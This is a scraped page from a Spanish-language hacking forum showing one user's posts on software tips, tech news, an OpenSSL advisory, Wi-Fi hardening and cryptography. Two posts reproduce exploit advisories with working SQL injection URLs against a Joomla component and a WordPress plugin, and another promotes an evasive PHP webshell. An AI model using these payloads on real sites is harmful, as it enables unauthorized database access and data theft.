Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mayk0

#61
Acabas de formatear tu pc e instalaste Windows, tu pregunta es: Que programa le instalo a continuación? Muy fácil entras a la web de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y seleccionas los programas que deseas instalar y automaticamente se descargan e instalan.


Luego de seleccionar tus programas le das a donde dice "Get Installer" y descarga un archivo.exe el dual debes ejecutar como administrador y aparecerá lo siguiente:


Está descargando e instalado los programas que seleccionaste! Así de sensillo...

Lo bueno de esa web es que te baja todo junto y todas las últimas versiones de cada software que allas seleccionado!


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#62
Windows / Parkdale Speed Test
Abril 06, 2015, 12:20:04 AM
Una breve y simple descripción lo que hace este Software te permite obtener una lectura y escritura rápida desde sus discos duros, dispositivos cdrom y servidores de red en kilobytes, megabytes o incluso Gigabyte por segundo.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#63
Código: text
##################################################################################################
#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : http://demo.web-dorado.com/spider-random-article.html
#Date          : 22/03/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters
and hence affected by SQL injection vulnerability

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to catID and Itemid parameter


////////////////
///  POC   ////
///////////////


SQL Injection in catID parameter
=================================

Use error based double query injection with catID parameter

Injected Link--->

Like error based double query injection for exploiting username --->
http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13


SQL Injection in Itemid parameter
=================================

Itemid Parameter is exploitable using xpath injection
 
http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -

###################################################################################################
#64
Código: text
##################################################################################################
#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability
#Author        : Jagriti Sahu AKA Incredible
#Vendor Link   : https://www.wpbusinessintelligence.com
#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip
#Date          : 1/04/2015
#Discovered at : IndiShell Lab
#Love to       : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

Wordpress plugin "Business Intelligence" is not filtering data in GET parameter  ' t ', which in is file 'view.php'
and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place.



///////////////////////////////
// Vulnerability Description: /
///////////////////////////////

vulnerability is due to parameter " t " in file 'view.php'.
user can inject sql query using GET parameter 't'


////////////////
///  POC   ////
///////////////


POC Image URL--->
=================
http://tinypic.com/view.php?pic=r8dyl0&s=8#.VRrvcuHRvIU


SQL Injection in parameter 't' (file 'view.php'):
=================================================

Injectable Link--->    http://server/wp-content/plugins/wp-business-intelligence/view.php?t=1

Union based SQL injection exist in the parameter which can be exploited as follows:


Payload used in Exploitation for Database name --->

http://server/wp-content/plugins/wp-business-intelligence/view.php
?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+


###
EDB Note: PoC might need work depending on version of plugin.
The provided software link is for the lite version.
Tested with following PoC:
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=1
wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=2
###


###################################################################################################
#65
Movistar triplicará la velocidad a todos sus clientes de fibra alcanzando los 300 megas


Según ha podido saber ADSLZone, Movistar triplicará la velocidad de su oferta de fibra óptica en sus dos modalidades. Los clientes con 10 megabits pasarán a tener 30 megas mientras que los abonados con 100 megabits pasarán a tener 300 megas. La operadora se convertirá así en la primera compañía de telecos de España y de Europa en comercializar 300 mbps a clientes residenciales.

Se avecinan cambios importantes en las ofertas de banda ancha ultrarrápida de la operadora presidida por César Alierta. Tras confirmar el pasado mes de febrero que todos los clientes de ADSL dispondrían de la máxima velocidad que soportara su línea, ahora llegan los cambios en las ofertas de fibra óptica. En pocas semanas, los clientes con 10 megabits pasarán a tener 30 megas de bajada y 3 de subida mientras que los abonados con 100 megabits subirán hasta 300 de bajada y 30 megabits de subida. La migración de velocidad será gratuita sin necesidad de que el cliente deba llamar a la compañía para solicitar la mejora de su línea. Simplemente será necesario apagar y encender el router una vez que el cambio se haya efectuado.

Este movimiento iría acompañado del compromiso de la compañía con todos sus clientes de ADSL y VDSL de que serán migrados a fibra óptica sin coste en cuanto esta nueva red esté disponible en sus localidades. Recordamos que la operadora mantiene su compromiso de alcanzar 14 millones de hogares en cobertura este mismo año a pesar de los cambios regulatorios.

Nuevos precios

Aunque la triplicación de velocidad será gratuita, hace semanas que la operadora ha modificado el precio de su oferta de fibra en su página web. Actualmente los 100 megas tienen un precio de 38 euros mientras que la tarifa anterior vigente hasta el próximo 7 de abril era de 36,1 euros al mes IVA incluido. Aquellos clientes que necesiten cambiar el router y la ONT para poder soportar la nueva velocidad recibirán los equipos de forma gratuita. Según estimaciones de la compañía a las que hemos tenido acceso, el coste de esta migración podría alcanzar los 70 euros por hogar.

Cambios en Movistar Fusión

La operadora también está preparando una batería de cambios en su oferta convergente para reforzar su posición. Además de la triplicación de velocidad en las ofertas de fibra, Luis Miguel Gilpérez, Presidente de la compañía en España, adelantó que llegarían nuevos servicios en junio durante la presentación de la nueva temporada de Motociclismo. Según ha podido saber este medio, las mejoras irán acompañadas de una ligera subida en el precio de las ofertas que podría rondar los 5 euros al mes. Actualmente, la operadora cuenta con más de 3,7 millones de clientes de  "Fusión" y 1,4 millones de líneas móviles adicionales en su oferta convergente.

En resumen, la velocidad de la banda ancha vuelve a dispararse en España situando a nuestro país entre los más rápidos de la Unión Europea. A continuación encontrarás una tabla resumen con las diferentes velocidades disponibles en el mercado.

Fuente: adslzone
#66
Esta Noticia fué lanzada el 20 de Marzo, pero como nadie la publicó, lo hago ahora..


El proyecto OpenSSL ha publicado un boletín en el que corrige 13 nuevas vulnerabilidades, dos de ellas calificadas de impacto bajo y otras 10 como moderado, pero una está valorada como de gravedad alta. Aunque no todas las versiones de OpenSSL están afectadas por todas las vulnerabilidades.


La vulnerabilidad considerada de gravedad alta (CVE-2015-0291) puede permitir denegaciones de servicio si un cliente se conecta a un servidor de OpenSSL 1.0.2 y renegocia con un algoritmo de firma digital inválido, lo que provoca una referencia a un puntero nulo.

Por otra parte, también se ha recalificado la gravedad de la vulnerabilidad FREAK, que previamente había sido clasificada como de gravedad baja, ahora pasa a considerarse como de gravedad alta. Esto es debido a que se ha comprobado que es mucho más habitual de lo que inicialmente se pensaba.

Con gravedad moderada se han anunciado vulnerabilidades en la funcionalidad "multiblock", en las rutinas de verificación de firmas si se usa ASN.1 con algoritmo RSA PSS y parámetros inválidos, al reutilizar estructuras en el tratamiento ASN.1, en el tratamiento de PKCS#7, en el tratamiento de datos codificados en base64, al procesar mensajes SSLv2 CLIENT-MASTER-KEY específicamente creados y en las funciones "DTLSv1_listen" y "ASN1_TYPE_cmp".

OpenSSL ha publicado las versiones 1.0.2a, 1.0.1m, 1.0.0r y 0.9.8zf disponibles desde
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
También se recuerda por parte de OpenSSL que las versiones 1.0.0 y 0.9.8 acaban su soporte a finales de año.

Más información:

OpenSSL Security Advisory [19 Mar 2015]
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

FREAK, un nuevo ataque a SSL/TLS
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: unaaldia.hispasec
#67

Finalmente será este verano cuando los usuarios de Windows puedan actualizar a Windows 10. No serán todos, pero sí la mayoría de los que utilizan un sistema operativo de escritorio. Sin embargo, la compañía de Redmond se ha olvidado de gran parte de sus usuarios, y nos referimos principalmente a los que han confiado en sus tabletas y sus teléfonos inteligentes. Si tienes Windows RT, olvídate de actualizaciones.

Destacado: Windows 10 llegará en verano a 190 países.
Para Microsoft, Windows XP ha terminado suponiendo un problema. Y es que, aunque se trata de una de las versiones de su sistema operativo que mayor éxito han tenido, ha sido este precisamente el problema. Hasta hace sólo algunos meses, Windows XP se posicionaba como la versión con mayor cuota de mercado, a pesar de que Windows Vista, Windows 7, Windows 8 y Windows 8.1 han llegado posteriormente. El problema, como ya hemos explicado en otras ocasiones, está en que se dejó de ofrecer soporte hace ya casi un año, en abril de 2014.

En una tabla simplificada podemos ver ya que la compañía de Redmond, Microsoft, actualizará a Windows 10 de forma gratuita y directa, con una imagen ISO, los sistemas operativos Windows 7, Windows 8 y Windows 8.1 de escritorio. Por otra parte, Windows Phone 8.1 también se actualizará vía OTA a Windows 10. Fuera de esta lista se quedan, sin embargo, dispositivos con Windows Phone 7 y Windows Phone 8.0, en cuanto a los teléfonos inteligentes.


La muerte de las tabletas con Windows RT ha llegado

Como paso intermedio entre la experiencia completa de Windows y la experiencia móvil, Microsoft decidió introducir Windows RT. Una versión que daba a sus tabletas, algunas de ellas, funciones de móvil y características más cercanas al entorno de escritorio. En su gama Surface podemos encontrar dispositivos con esta versión, para la cual no se ha llegado a desarrollar siquiera el navegador Google Chrome, por ejemplo.

La confianza de los desarrolladores, y por tanto la presencia de aplicaciones para estos dispositivos, ha sido nula. Ahora bien, parece que Microsoft prefiere no apostar por ese terreno, puesto que los usuarios con Windows RT quedarán sentenciados a esta versión, que no se actualizará a Windows 10 ni habrá forma de hacerlo de manera oficial, a pesar de que por hardware sí habría compatibilidad.
#68

El nuevo programa de la Agencia de Proyectos de Investigación Avanzados de Defensa del Pentágono (DARPA) busca eliminar la pérdida de memoria causada por el traumatismo craneoencefálico, a través de la implantación de dispositivos inalámbricos en el cerebro.

"Necesitamos un dispositivo de nueva generación, que aún no existe" dijo el jefe del programa de DARPA, Justin Sanchez. "Ese es el problema principal que tratamos de solucionar mediante estos proyectos, implementar un 'hardware' que pueda solventar la pérdida de memoria de quienes sufrieron traumatismo craneoencefálico".

El programa Restoring Active Memory (RAM, por sus siglas en inglés) pretende desarrollar tecnologías capaces de desafiar el problema de la pérdida de memoria mediante la aplicación de nuevas técnicas de neuroprótesis, informa el portal de la agencia.

El objetivo de los científicos es crear un dispositivo inalámbrico neuronal que podría con facilidad implantarse en el cerebro para descifrar los impulsos nerviosos, cuyo entendimiento ayudaría a restablecer la memoria a través de una estimulación neuronal.

El traumatismo craneoencefálico se ha convertido en un problema grave en EE.UU. Más de 270.000 de soldados estadounidenses fueron diagnosticados desde el inicio de este siglo con esa afectación del cerebro, mientras el número de civiles que la padecen asciende a 1,7 millones.

Fuente: RtActualidad
#69
Igual yo soy de Argentina y me quedo con la pasta térmica, la que más se vende como barata es la pasta térmica "DELTA" jaja
#70

Bueno En realidad existen varios programas encargados de esto, la optimización de sistemas de Windows.

Principalmente si usas varios softwares como por ejemplo Ccleaner que nunca dejó de estar en el top de uno de los mejores. Utilizando también Advanced systemcare & el infaltable Defraggler. Estos softwares pueden ayudarte con el rendimiento de la pc, pero en este caso traigo otra cosa diferente. Algo sencillo y básico de principiantes.

Liberar memoria RAM y optimizar un poco el rendimiento, solo debes buscar cual es la capasidad de memoria RAM correspondiente a tu pc, luego copiamos el código en un block de notas (Notepad) y lo guardamos como secuencia de comando osea con la terminación .vbe

Como por ejemplo: Liberar-ram.vbe

Luego para liberar la RAM solo deben darle doble click en el icono que se nos creó y verán algunos cambios notorios si la RAM esta un poco saturada de registros!

Para 128 MB de RAM: Mystring=(80000000)
Para 256 MB de RAM: Mystring=(160000000)
Para 512 MB de RAM: Mystring=(320000000)
Para 1 GB de RAM: Mystring=(655000000)
Para 2 GB de RAM: Mystring=(1000000000)
Para 3 GB de RAM: Mystring=(1655000000)
Para 4 GB de RAM: Mystring=(2000000000)
Para 5 GB de RAM: Mystring=(2650000000)
Para 6 GB de RAM: Mystring=(3000000000)
Para 7 GB de RAM: Mystring=(3650000000)
Para 8 GB de RAM: Mystring=(4000000000)
Para 16 GB de RAM: Mystring=(7300000000)

Fuente: Fanpage/ Hacktivismo Latinoamerica
#71
#; Les voy a dejar algunos consejos para nuestras redes locales Wifi!


Como ya sabemos crackear redes Wifi se ha vuelto algo muy común en todos los paises. Hoy en día las herramientas automatizadas lo están haciendo todo y esto pone más fácil que noes puedan espiar nuestros datos, tráfico de red. De esta manera podríamos ser victimas de un ataque vulenrando nuestra seguridad y robando nuestras identidades digitales. A continuación algunos Puntos que deben tener en cuenta chic@s!

--Consejos básicos de seguridad
Estos consejos básicos de seguridad seguro que los conocéis la inmensa mayoría, así que los voy a enumerar de forma sucinta:


#‎ConsejoUno‬

La primera, bien obvia: No dejes tu red inalámbrica abierta, sin protección alguna. Así, cualquiera que tenga la señal al alcance se podrá conectar, y con un poco de malicia, acceder a nuestros datos privados, además de reducir nuestro ancho de banda disponible.

#‎ConsejoDos‬

Cambia la configuración por defecto del router. Aunque ahora la mayoría de los routers llevan activada una encriptación básica, con una contraseña que viene pegada al propio router, es fácilmente descifrable en unos pocos minutos, incluso con un teléfono móvil. Para acceder a la configuración del router y cambiarla, debemos escribir su dirección en el navegador, normalmente algo similar a 192.168.0.1

De las opciones de encriptación, elige la WPA2-PSK, que es sin duda la más difícil y tediosa de atacar. Además, es de las más cómodas de usar, pues podemos poner una contraseña a nuestro elección, mucho más fácil de recordar cuando vienen invitados. Eso sí, conviene elegir una contraseña que no se obvia, no es la primera vez que me encuentro con redes cuya contraseña es idéntica al nombre de la red.
Añadiendo y remarcando siempre lo mismo, hoy en día hay aplicaciones que están automatizando estos ataque y es más fácil vulnerarnos. Un ejemplo la herramienta llamada Linset, que está usando el metodo de ingeniería social para conseguir nuestras claves wifi.

-----------------------------

#; Consejos avanzados de seguridad Wifi


Si a pesar de haber elegido una buena encriptación para nuestra red, y escogido una contraseña adecuada, queremos asegurarnos más aún la seguridad —valga la redundancia—, hay otras cosas que podemos hacer:

#‎ConsejoUno‬

Ocultar nuestra red, haciendo que el SSID no sea visible. No es que sea realmente una medida de seguridad muy fuerte, pues existen programas que fácilmente las revelan, pero ayuda a complicar las cosas un poco más a quien tenga intención de acceder a nuestra red. El inconveniente es que para configurar nuevos dispositivos, deberá hacerse de forma manual.

‪#‎ConsejoDos‬

Crear una lista blanca de direcciones MAC. Cada dispositivo con tarjeta de red inalámbrica, ya sea móvil, tablet u ordenador, tiene una dirección única que lo identifica —de hecho, la identificación es de la propia tarjeta—. Con esa información, podemos crear una lista de dispositivos autorizados en nuestra red, para que ningún otro dispositivo se pueda conectar sin que demos nosotros mismos de alta esa dirección en la lista. Sin embargo hay que tener en cuenta que un usuario avanzado con malas intenciones puede cambiar la MAC de su ordenador por una autorizada.

-----------------------------

#; Algunos otros consejitos o Tips para mejorar tu seguridad Wifi siempre hay que tener en cuenta estos puntos!

#‎Consejos‬
Comprobar qué dispositivos están conectados a nuestra red. La mayoría de los routers ofrecen la posibilidad de conocer los dispositivos conectados a la red en ese momento. De esta manera, podemos saber si tenemos un intruso, y actuar en consecuencia, cambiando inmediatamente la contraseña y la SSID de nuestra red.

Limitar el número de conexiones del router, para que no haya más de las que necesites, así no admitirá nuevas conexiones. Si en algún momento la necesitamos, podemos ampliarla temporalmente.

Configurar el router para que sólo se pueda controlar desde una conexión LAN, y no a través de la red WiFi, así nos aseguramos que si alguien consigue entrar en la red, no pueda modificar nuestra configuración a su antojo.

Como han añadido en los comentarios, también es una buena opción desactivar el DHCP y asociar direcciones MAC a IPs de manera estática en el router.

Otro consejo que deben tener en cuenta es el roll importante que cumplen los ‪#‎Cortafuegos‬ o ‪#‎Firewalls‬ en los sistemas!

Por muy segura que sea la configuración del router, debes tener una segunda línea de defensa en la que refugiarte en caso de que alguien consiga acceder a tu red y tenga malas intenciones (o simplemente curiosidad). Si el cifrado de la conexión WiFi falla y no tienes un cortafuegos en tu PC, cualquiera podrá acceder a tus carpetas compartidas.

El muro más importante que debes levantar es el cortafuegos / firewall. Todos los sistemas operativos incluyen uno, y hay utilidades que facilitan su puesta a punto. Por otro lado, en nuestro especial sobre detección de intrusos en redes WiFi recomendamos varias utilidades para detectar e identificar visitas inesperadas.

Fuente: Fanpage/ Hacktivismo Latinoamerica
#72
Fallo en Raspberry Pi 2 hace que la luz de los flashes de xenon cuando tomemos una imagen de placa se quede bloqueada unos cuantos segundos para, posteriormente, reiniciarse y volver a funcionar con normalidad.

Si hacemos una foto con un flash LED no tendremos ningún problema pero si optamos por usar uno de xenon nos vamos a topar con este problema. ¿Por qué? Muy sencillo: los chips son fotosensibles y un flash de este tipo produce luz ultravioleta a través de infrarrojos. Muchos plásticos que se usan en carcasas son semitransparentes a los infrarrojos y hacen que las luces en los bordes del espectro visible lleguen a los chips.

De hecho, si revisamos el espectro de luz de una lámpara de xenon vemos que hay un montón de picos en la parte infrarroja. Al parecer el problema está con el chip que se encarga de la alimentación de la placa base que al recibir esta luz hace que Raspberry Pi 2 tenga este problema que, por otra parte, es más común de lo que parece.
El problema radica en que no se ha sabido cubrir bien los componentes para evitar el problema. Mientras esperamos a que Raspberry diga algo al respecto, ya hay algunos vídeos donde podemos ver cómo se provoca el fallo y el efecto que produce cuando disparamos el flash de xenon sobre ella.



Fuente: Fanpage/ Hacktivismo Latinoamerica
#73

Si te gusta el hardware seguro que has leído decenas de reviews y comparativa sobre qué pasta térmica utilizar para montar tu procesador pero seguro que no has mirado en tu despensa. A los chicos de CoolerMaster no se les ha ocurrido mejor idea para celebrar el Día Internacional de Nutella (no es broma) que probar qué tal funciona a la hora de disipar calor. En el siguiente vídeo lo demuestran y, sorprendentemente, el ordenador mantiene unos razonables 50º incluso a pleno rendimiento.

Nota: aunque como comprobaréis el experimento no sale mal del todo, es obvio que utilizar Nutella a largo plazo es poco menos que una locura. Además de que perdería sus propiedades en muy poco tiempo al secarse, la pasta de cacao incluye una cantidad de sodio suficiente para causar corrosión en el chasis que protege al microprocesador. Una idea divertida, pero para probar con micros y placas viejas.



Fuente: Muycomputer
#74

Retailers europeos han puesto a la venta en Europa el nuevo disco duro Seagate 8 TB, la mayor capacidad que ofrece actualmente la industria.
Aunque las SSD son la solución estrella del almacenamiento mundial por sus múltiples ventajas frente a los discos duros, éstos aún siguen siendo imbatibles en el coste por Gbyte y los 8 Tbytes de este Seagate a la venta desde 249 euros lo demuestran.

Su nombre Archive HDD muestra su enfoque para almacenamiento masivo, almacenamiento en nube, NAS, soluciones de almacenamiento externo o como unidad secundaria en equipos donde el sistema operativo y principales aplicaciones sean responsabilidad de una SSD.

El Seagate 8 TB (ST8000AS0002) se ofrece en formato estándar de 3,5 pulgadas y cuenta con 128 Mbytes de caché. Su tiempo medio entre fallos (MTBF) se establece en 800.000 horas, buen dato que asegura una larga vida del producto. Tiene 5.900 revoluciones de velocidad de giro y velocidades de 150 Mbytes por segundo.

Seagate asegura que esta serie consume menos que la media y hace menos ruido. La firma ofrece tres años de garantía y ya se puede reservar para entrega en este mes de febrero.

Fuente: Muycomputer
#75
Shells / Daws, un webshell avanzado!
Febrero 09, 2015, 05:55:16 PM

DAws es un webshell php, escrito por dotcppfile y Aces, que tiene varias cosas que lo hacen bastante interesante:

- evasión de disablers: no sólo usa una función para conseguirlo si no que utiliza hasta seis distintas si es necesario. Por ejemplo, si shell_exec está desactivado en su lugar intentará utilizar exec, passthru, system, popen o proc_open. Igual que para descargar un archivo de un enlace, si no se puede usar curl  lo sustituirá por file_get_content que además se utilizará en cada sección y función del shell.

- codificación automática en base64: DAws codifica automáticamente la mayoría de sus GET y POST usando Java Script o PHP lo que permitirá al shell evadir casi todos los WAF existentes.

- administrador avanzado de archivos: DAws tiene todo lo que necesita un gestor de archivos y aún más, pero sus características principales son que todo se muestra de forma dinámica; los permisos de todos los archivos y carpetas se comprueban, por lo que las funciones que se pueden utilizar estarán disponibles basándose en esos permisos, lo que ahorrará tiempo y hára todo mucho más fácil.

- herramientas: DAws tiene bastantes herramientas útiles, tales como "bpscan", que puede identificar los puertos utilizables y no bloqueados en el servidor en pocos minutos y para más adelante usar por ejemplo un shell bind.

- todo lo que no se puede utilizar será eliminado simplemente para que los usuarios no tengan que perder el tiempo. Por ejemplo la ejecución de scripts c++ cuando no hay compiladores de C++ en el servidor (DAws habría comprobado múltiples compiladores en el primer lugar), en ese caso, la función será eliminada automáticamente.

- soporta Windows y Linux.

- código fuente abierto.

Proyecto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#76

Acaba de ser presentada la nueva Raspberry Pi 2 que supondrá un antes y un después no sólo por ser capaz de ofrecer un procesador cuatro núcleos a 900 MHz con 1GB de RAM por apenas 35€, sino también porque supondrá la incursión de Microsoft en este tipo de dispositivos con el lanzamiento de una versión adaptada de Windows 10.

Según ha anunciado la propia Microsoft, esta versión adaptada será gratuita para los creadores registrados en su programa del Internet de las Cosas, algo muy parecido a lo que ya anunciaron para las licencias en dispositivos móviles de 7 pulgadas o menos. Por eso mismo cabe la posibilidad de que, como en los móviles, esta versión para Raspberry Pi 2 tampoco tenga el famoso menú de inicio de Windows 10, aunque esto ya es pura especulación sin nada confirmado.


Los detalles de esta asociación entre Microsoft y Raspberry Pi, así como las primeras informaciones sobre cómo será la versión adaptada de Windows 10, los iremos conociendo durante los próximos meses. Pero lo que ya está claro es que Microsoft entrará a competir en un sector dominado por las distribuciones GNU/Linux, por lo que el morbo está asegurado.

Fuente: Genbeta
#77
Criptografía / Criptografía. Seguridad informatica
Febrero 02, 2015, 06:54:38 PM
La criptografía es la técnica que protege documentos y datos. Funciona a través de la utilización de cifras o códigos para escribir algo secreto en documentos y datos confidenciales que circulan en redes locales o en internet. Su utilización es tan antigua como la escritura. Los romanos usaban códigos para ocultar sus proyectos de guerra de aquellos que no debían conocerlos, con el fin de que sólo las personas que conocían el significado de estos códigos descifren el mensaje oculto.

A partir de la evolución de las computadoras, la criptografía fue ampliamente divulgada, empleada y modificada, y se constituyó luego con algoritmos matemáticos. Además de mantener la seguridad del usuario, la criptografía preserva la integridad de la web, la autenticación del usuario así como también la del remitente, el destinatario y de la actualidad del mensaje o del acceso.

Las llaves pueden ser:

Simétricas: Es la utilización de determinados algoritmos para descifrar y encriptar (ocultar) documentos. Son grupos de algoritmos distintos que se relacionan unos con otros para mantener la conexión confidencial de la información.

Asimétrica: Es una fórmula matemática que utiliza dos llaves, una pública y la otra privada. La llave pública es aquella a la que cualquier persona puede tener acceso, mientras que la llave privada es aquella que sólo la persona que la recibe es capaz de descifrar.

Criptografía es la ciencia y arte de escribir mensajes en forma cifrada o en código. Es parte de un campo de estudios que trata las comunicaciones secretas, usadas, entre otras finalidades, para:

- autentificar la identidad de usuarios;
- autentificar y proteger el sigilo de comunicaciones personales y de transacciones comerciales y bancarias;
- proteger la integridad de transferencias electrónicas de fondos.


Un mensaje codificado por un método de criptografía debe ser privado, o sea, solamente aquel que envió y aquel que recibe debe tener acceso al contenido del mensaje. Además de eso, un mensaje debe poder ser suscrito, o sea, la persona que la recibió debe poder verificar si el remitente es realmente la persona que dice ser y tener la capacidad de identificar si un mensaje puede haber sido modificado.

Los métodos de criptografía actuales son seguros y eficientes y basan su uso en una o más llaves. La llave es una secuencia de caracteres, que puede contener letras, dígitos y símbolos (como una contraseña), y que es convertida en un número, utilizada por los métodos de criptografia para codificar y decodificar mensajes.

Actualmente, los métodos criptográficos pueden ser subdivididos en dos grandes categorías, de acuerdo con el tipo de llave utilizado: criptografia de llave única y la criptografía de llave pública y privada

Que es criptografía de llave única?

La criptografía de llave única utiliza la misma llave tanto para codificar como para decodificar mensajes. A pesar de que este método es bastante eficiente en relación al tiempo de procesamiento, o sea, el tiempo que gasta para codificar y decodificar mensajes, tiene como principal desventaja la necesidad de utilización de un medio seguro para que la llave pueda ser compartida entre personas o entidades que deseen intercambiar informacion criptografiada.

Que es la criptografía de llaves pública y privada?

La criptografía de llaves pública y privada utiliza dos llaves distintas, una para codificar y otra para decodificar mensajes. Con este método cada persona o entidad mantiene dos llaves: una pública, que puede ser divulgada libremente, y otra privada, que debe ser mantenida en secreto por su dueño. Los mensajes codificados con la llave pública solo pueden ser decodificados con la llave privada correspondiente.

Como ejemplo, José y Maria quieren comunicarse de manera sigilosa. Entonces, ellos tendrán que realizar los siguientes procedimientos:

José codifica un mensaje utilizando la llave pública de Maria, que está disponible para el uso de cualquier persona;
Después de criptografiada, José envía el mensaje a Maria, a través de Internet;
Maria recibe y decodifica el mensaje, utilizando su llave privada, que es sólo de su conocimiento;
Si Maria quisiera responder el mensaje, deberá realizar el mismo procedimiento, pero utilizando la llave pública de José.
A pesar de que este método tiene un desempeño muy inferior en relación al tiempo de procesamiento, comparado al método de criptografía de llave única, presenta como principal ventaja la libre distribución de llaves públicas, no necesitando de un medio seguro para que llaves sean combinadas con antelación.

Que es firma digital?

La firma digital consiste en la creación de un código, a través de la utilización de una llave privada, de modo que la persona o entidad que recibe un mensaje conteniendo este código pueda verificar si el remitente es quien dice ser e identificar cualquier mensaje que pueda haber sido modificado.

De esta forma, es utilizado el método de criptografía de llaves pública y privada, pero en un proceso inverso al presentado en el ejemplo anterior.

Si José quisiera enviar un mensaje suscrito a Maria, él codificará un mensaje con su llave privada. En este proceso será generada una firma digital, que será añadida al mensaje enviado a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta recibir el mensaje, Maria utilizará la llave pública de José para decodificar el mensaje. En este proceso será generada una segunda firma digital, que será comparada con la primera. Si las firmas fueran idénticas, Maria tendrá certeza de que el remitente del mensaje fue José y que el mensaje no fue modificado.

Es importante resaltar que la seguridad del método se basa en el hecho de que la llave privada es conocida sólo por su dueño. También es importante resaltar que el hecho de firmar un mensaje no significara un mensaje sigiloso. Para el ejemplo anterior, si José quisiera firmar el mensaje y tener certeza de que sólo Maria tendra acceso a su contenido, sería preciso codificarla con la llave pública de Maria, despues de firmarla.

Que ejemplos pueden ser citados sobre el uso de criptografía de llave única y de llaves pública y privada?

Ejemplos que combinan la utilización de los métodos de criptografía de llave única y de llaves pública y privada son las conexiones seguras,establecidas entre el browser de un usuario y una web, en transacciones comerciales o bancarias vía Web.

Estas conexiones seguras vía Web utilizan el método de criptografia de llave única, implementado por el protocolo SSL (Secure Socket Layer). El browser del usuario necesita informar a la web cual será la llave única utilizada en la conexión segura, antes de iniciar una transmisión de datos sigilosos.

Para esto, el browser obtiene la llave pública del certificado de la institucion que mantiene la web . Entonces, utiliza esta llave pública para codificar y enviar un mensaje a la web ,contiendo la llave única a ser utilizada en la conexión segura. La web utiliza su llave privada para decodificar el mensaje e identificar la llave única que será utilizada.

A partir de este punto, el browser del usuario y la web pueden transmitir informaciones, de forma sigilosa y segura, a través de la utilizacion del método de criptografía de llave única. La llave única puede ser cambiada a intervalos de tiempo determinados, a través de la repeticion de procedimientos descritos anteriormente, aumentando así el nivel de seguridad de todo el proceso.

Que tamaño de llave debe ser utilizado?

Los métodos de criptografía actualmente utilizados, y que presentan buenos niveles de seguridad, son públicamente conocidos y son seguros por la robustez de sus algoritmos y por el tamaño de las llaves que utilizan.

Para que alguien descubra una llave necesita utilizar algun método de fuerza bruta, o sea, probar combinaciones de llaves hasta que la correcta sea descubierta. Por lo tanto, cuanto mayor sea la llave, mayor será el número de combinaciones a probar, inviabilizando así el descubrimiento de una llave en un tiempo normal. Además de eso, las llaves pueden ser cambiadas regularmente, haciendo los métodos de criptografía aún más seguros.

Actualmente, para obtenerse un buen nivel de seguridad en la utilización de un método de criptografía de llave única, es aconsejable utilizar llaves de un mínimo de 128 bits. Y para el método de criptografía de llaves pública y privada es aconsejable utilizar llaves de 2048 bits, siendo el mínimo aceptable de 1024 bits. Dependiendo para los fines para los cuales los métodos criptográficos serán utilizados, se debe considerar la utilización de llaves mayores: 256 o 512 bits para llave única y 4096 o 8192 bits para llaves pública y privada.



#78
Ingeniería inversa aplicado a sistemas desarrollados
con programación orientada a objetos para obtener la
documentación



INDICE
INTRODUCCION 9
CAPITULO I
1. PLANTEAMIENTO DEL PROBLEMA 12
1.1. Fundamentación del problema 12
1.2. Descripción de la Realidad 14
1.2.1. La falta de documentación 14
1.2.2. La importancia del mantenimiento de software 15
1.3. Antecedentes del Problema 20
1.4. Justificación de la Investigación 24
1.5. Importancia de la Investigación 25
1.6. Limitaciones de la Investigación 25
CAPITULO II
2. FORMULACION DEL PROBLEMA 26
2.1. Objetivos 26
2.1.1. Objetivos Generales 26
2.1.2. Objetivos Específicos 26
2.2. Definición del Problema 26
CAPITULO III
3. MARCO TEORICO CONCEPTUAL 29
3.1. Antecedentes de la Investigación 29
3.2. Bases Teóricas 31 5
3.2.1. Mantenimiento de Software 31
3.2.1.1. Tipos de Mantenimiento de Software 33
3.2.1.2. La Gestión del mantenimiento de software 35
3.2.1.3. Soluciones Técnicas 38
3.2.2. Ingeniería Inversa 39
3.2.2.1. Objetivos y Beneficios 40
3.2.2.2. Elementos 42
3.2.2.3. Fases 44
3.2.2.4. Áreas 52
3.2.2.5. Inconvenientes 53
3.2.2.6. Herramientas CASE 53
3.3. Definiciones Básicas 54
3.3.1. ingeniería Inversa 54
3.3.2. Reingeniería 54
3.3.3. UML 54
3.3.4. Programación Orientada a Objetos 55
CAPITULO IV
4. METODOLOGIA PROPUESTA 56
